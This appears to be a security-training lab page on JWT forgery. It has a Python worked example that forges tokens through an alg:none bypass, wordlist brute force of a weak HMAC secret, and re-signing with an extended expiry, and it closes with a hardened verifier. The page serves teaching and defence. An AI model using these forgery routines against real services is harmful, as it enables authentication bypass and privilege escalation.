
JWT Forgery

Intermediate

Exploit three classic JWT implementation flaws: an alg:none bypass, a weak-secret brute force, and claim tampering. Each attack produces a forged token that the simulated server accepts with a 200 OK.

1. alg:none Attack
Strip the signature and change alg to none. The server trusts the alg field in the header it is verifying, so it accepts the unsigned token and whatever claims it carries.

2. Weak Secret Brute Force
The server uses 'secret' as its HMAC key. Because you already hold a validly signed token, the key can be guessed offline by re-computing the signature for each candidate; once found, sign your own admin token.

3. Expired Claim Tampering
The token has an expired exp claim, which the server does enforce. Extend the expiry and re-sign with the known secret so the signature still validates.
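The three attacks above, and the hardened verifier the page's closing section alludes to, as one added worked example. This is illustration code written for this edit, not the simulation's own server or client. It assumes HS256 tokens, a claim named "role" that the server authorises on, the key 'secret' named in step 2, and a constructed five-word wordlist; the vulnerable verifier is a deliberate model of the flaws, not a real library.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed for this example: the simulated server's guessable HMAC key
# (from step 2) and a tiny wordlist. Neither is part of the original page.
WEAK_SECRET = "secret"
WORDLIST = ["password", "123456", "admin", "secret", "letmein"]
HEADER_HS256 = {"alg": "HS256", "typ": "JWT"}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256(signing_input: bytes, secret: str) -> str:
    return b64url_encode(hmac.new(secret.encode(), signing_input, hashlib.sha256).digest())


def encode_jwt(header: dict, payload: dict, secret: Optional[str]) -> str:
    """Serialise header.payload.signature; alg:none yields an empty signature."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = "" if header.get("alg") == "none" else hs256(f"{h}.{p}".encode(), secret)
    return f"{h}.{p}.{sig}"


def decode_parts(token: str):
    h, p, sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), sig


def issue_user_token(secret: str = WEAK_SECRET, lifetime: int = 3600) -> str:
    """What the simulated server hands a normal user (assumed claim layout)."""
    exp = int(time.time()) + lifetime
    return encode_jwt(HEADER_HS256, {"sub": "alice", "role": "user", "exp": exp}, secret)


def vulnerable_verify(token: str, secret: str = WEAK_SECRET) -> Optional[dict]:
    """Simulated vulnerable server: trusts whatever alg the header names."""
    header, payload, sig = decode_parts(token)
    h, p, _ = token.split(".")
    alg = header.get("alg")
    if alg == "none":
        pass  # flaw 1: unsigned tokens are accepted
    elif alg == "HS256":
        if not hmac.compare_digest(sig, hs256(f"{h}.{p}".encode(), secret)):
            return None  # flaw 2: the key is guessable, so a valid sig is forgeable
    else:
        return None
    if payload.get("exp", 0) < time.time():
        return None  # exp IS enforced, which is why attack 3 has to re-sign
    return payload


def hardened_verify(token: str, secret: str) -> Optional[dict]:
    """Algorithm pinned to HS256, exp mandatory; still needs a strong secret."""
    header, payload, sig = decode_parts(token)
    h, p, _ = token.split(".")
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(sig, hs256(f"{h}.{p}".encode(), secret)):
        return None
    if "exp" not in payload or payload["exp"] < time.time():
        return None
    return payload


def attack_alg_none(token: str) -> str:
    """Attack 1: drop the signature, set alg=none, promote the role claim."""
    header, payload, _ = decode_parts(token)
    header["alg"] = "none"
    payload["role"] = "admin"
    return encode_jwt(header, payload, None)


def brute_force_secret(token: str, wordlist) -> Optional[str]:
    """Attack 2: recover the key offline by re-signing with each candidate."""
    h, p, sig = token.split(".")
    signing_input = f"{h}.{p}".encode()
    for guess in wordlist:  # no requests to the server are needed
        if hmac.compare_digest(hs256(signing_input, guess), sig):
            return guess
    return None


def forge_with_secret(token: str, secret: str, **claims) -> str:
    """Attacks 2 and 3: rewrite claims and re-sign with the recovered key."""
    header, payload, _ = decode_parts(token)
    payload.update(claims)
    return encode_jwt(header, payload, secret)


def attack_extend_expiry(token: str, secret: str, lifetime: int = 86400) -> str:
    """Attack 3: push exp into the future and re-sign so it still validates."""
    return forge_with_secret(token, secret, exp=int(time.time()) + lifetime)


if __name__ == "__main__":
    tok = issue_user_token()
    print("alg:none  ->", vulnerable_verify(attack_alg_none(tok)))
    key = brute_force_secret(tok, WORDLIST)
    print("secret    ->", key, vulnerable_verify(forge_with_secret(tok, key, role="admin")))
    stale = issue_user_token(lifetime=-60)
    print("expired   ->", vulnerable_verify(stale), "extended ->", vulnerable_verify(attack_extend_expiry(stale, key)))
```

Note what hardened_verify does and does not buy you: pinning the algorithm kills attack 1 outright, but attacks 2 and 3 only fail when the key has enough entropy that the offline guess never lands; a short expiry bounds how long a forged or stolen token stays useful, it does not stop the forgery.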

How to issue JWTs securely
Algorithm pinning, strong secrets, and short expiries
